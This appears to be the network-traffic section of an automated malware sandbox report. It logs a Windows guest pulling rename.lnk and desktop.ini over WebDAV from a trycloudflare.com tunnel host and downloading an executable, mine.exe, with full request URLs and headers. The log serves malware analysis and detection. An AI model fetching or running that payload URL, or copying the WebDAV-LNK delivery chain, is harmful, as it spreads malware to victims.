Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| hot-browser-luke-granted.trycloudflare.com | 104.16.231.132 |
- TCP Requests
-
-
192.168.56.101:49162 104.16.230.132:80hot-browser-luke-granted.trycloudflare.com
-
192.168.56.101:49164 104.16.230.132:80hot-browser-luke-granted.trycloudflare.com
-
192.168.56.101:49175 104.16.230.132:443hot-browser-luke-granted.trycloudflare.com
-
192.168.56.101:49181 104.16.230.132:443hot-browser-luke-granted.trycloudflare.com
-
192.168.56.101:49182 104.16.230.132:443hot-browser-luke-granted.trycloudflare.com
-
GET
200
https://hot-browser-luke-granted.trycloudflare.com/mine.exe
REQUEST
RESPONSE
BODY
GET /mine.exe HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: hot-browser-luke-granted.trycloudflare.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 01:04:20 GMT
Content-Type: application/x-msdownload
Content-Length: 5639512
Connection: keep-alive
CF-Ray: 929c695b3edbea14-ICN
CF-Cache-Status: DYNAMIC
Accept-Ranges: bytes
ETag: "dd4c7398e7aa0a149308249e3762e7a6-1743359513-5639512"
Last-Modified: Sun, 30 Mar 2025 18:31:53 GMT
Vary: Accept-Encoding
Server: cloudflare
OPTIONS
200
http://hot-browser-luke-granted.trycloudflare.com/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: DavClnt
translate: f
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 01:04:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 929c68dc3a8230d9-ICN
CF-Cache-Status: DYNAMIC
Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
dav: 1,2
ms-author-via: DAV
Server: cloudflare
OPTIONS
200
http://hot-browser-luke-granted.trycloudflare.com/
REQUEST
RESPONSE
BODY
OPTIONS / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 01:04:04 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Ray: 929c68fb2ae1ea9e-ICN
CF-Cache-Status: DYNAMIC
Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK
dav: 1,2
ms-author-via: DAV
Server: cloudflare
PROPFIND
207
http://hot-browser-luke-granted.trycloudflare.com/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 207 Multi-Status
Date: Wed, 02 Apr 2025 01:04:05 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 781
Connection: keep-alive
CF-Ray: 929c68feaa4bea9e-ICN
CF-Cache-Status: DYNAMIC
Server: cloudflare
PROPFIND
207
http://hot-browser-luke-granted.trycloudflare.com/
REQUEST
RESPONSE
BODY
PROPFIND / HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 207 Multi-Status
Date: Wed, 02 Apr 2025 01:04:05 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 781
Connection: keep-alive
CF-Ray: 929c69023b9cea9e-ICN
CF-Cache-Status: DYNAMIC
Server: cloudflare
PROPFIND
207
http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
REQUEST
RESPONSE
BODY
PROPFIND /rename.lnk HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 207 Multi-Status
Date: Wed, 02 Apr 2025 01:04:06 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 844
Connection: keep-alive
CF-Ray: 929c69037eacea9e-ICN
CF-Cache-Status: DYNAMIC
Server: cloudflare
PROPFIND
207
http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
REQUEST
RESPONSE
BODY
PROPFIND /rename.lnk HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 207 Multi-Status
Date: Wed, 02 Apr 2025 01:04:06 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 844
Connection: keep-alive
CF-Ray: 929c6906de9aea9e-ICN
CF-Cache-Status: DYNAMIC
Server: cloudflare
GET
200
http://hot-browser-luke-granted.trycloudflare.com/rename.lnk
REQUEST
RESPONSE
BODY
GET /rename.lnk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 01:04:07 GMT
Content-Type: application/octet-stream
Content-Length: 1882
Connection: keep-alive
CF-Ray: 929c690a4eaaea9e-ICN
CF-Cache-Status: DYNAMIC
Accept-Ranges: bytes
ETag: "78aea1717201a8ff492812f0baf1c690-1743361096-1882"
Last-Modified: Sun, 30 Mar 2025 18:58:16 GMT
Server: cloudflare
PROPFIND
207
http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
REQUEST
RESPONSE
BODY
PROPFIND /desktop.ini HTTP/1.1
Connection: Keep-Alive
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
Depth: 0
translate: f
Content-Length: 0
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 207 Multi-Status
Date: Wed, 02 Apr 2025 01:04:13 GMT
Content-Type: application/xml; charset=utf-8
Content-Length: 844
Connection: keep-alive
CF-Ray: 929c6936299eea9e-ICN
CF-Cache-Status: DYNAMIC
Server: cloudflare
GET
200
http://hot-browser-luke-granted.trycloudflare.com/desktop.ini
REQUEST
RESPONSE
BODY
GET /desktop.ini HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
translate: f
Host: hot-browser-luke-granted.trycloudflare.com
HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 01:04:14 GMT
Content-Type: application/octet-stream
Content-Length: 504
Connection: keep-alive
CF-Ray: 929c69376c79ea9e-ICN
CF-Cache-Status: DYNAMIC
Accept-Ranges: bytes
ETag: "6af446a219f170662a3c70b07ef42f8a-1738320942-504"
Last-Modified: Fri, 31 Jan 2025 10:55:42 GMT
Server: cloudflare
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLSv1 192.168.56.101:49182 104.16.230.132:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94 |
|
TLSv1 192.168.56.101:49181 104.16.230.132:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94 |
|
TLSv1 192.168.56.101:49175 104.16.230.132:443 |
C=US, O=Google Trust Services, CN=WR1 | CN=trycloudflare.com | c1:f5:d9:f4:2e:e4:62:4a:93:1f:06:f7:a0:22:d4:38:59:bf:bd:94 |
Snort Alerts
No Snort Alerts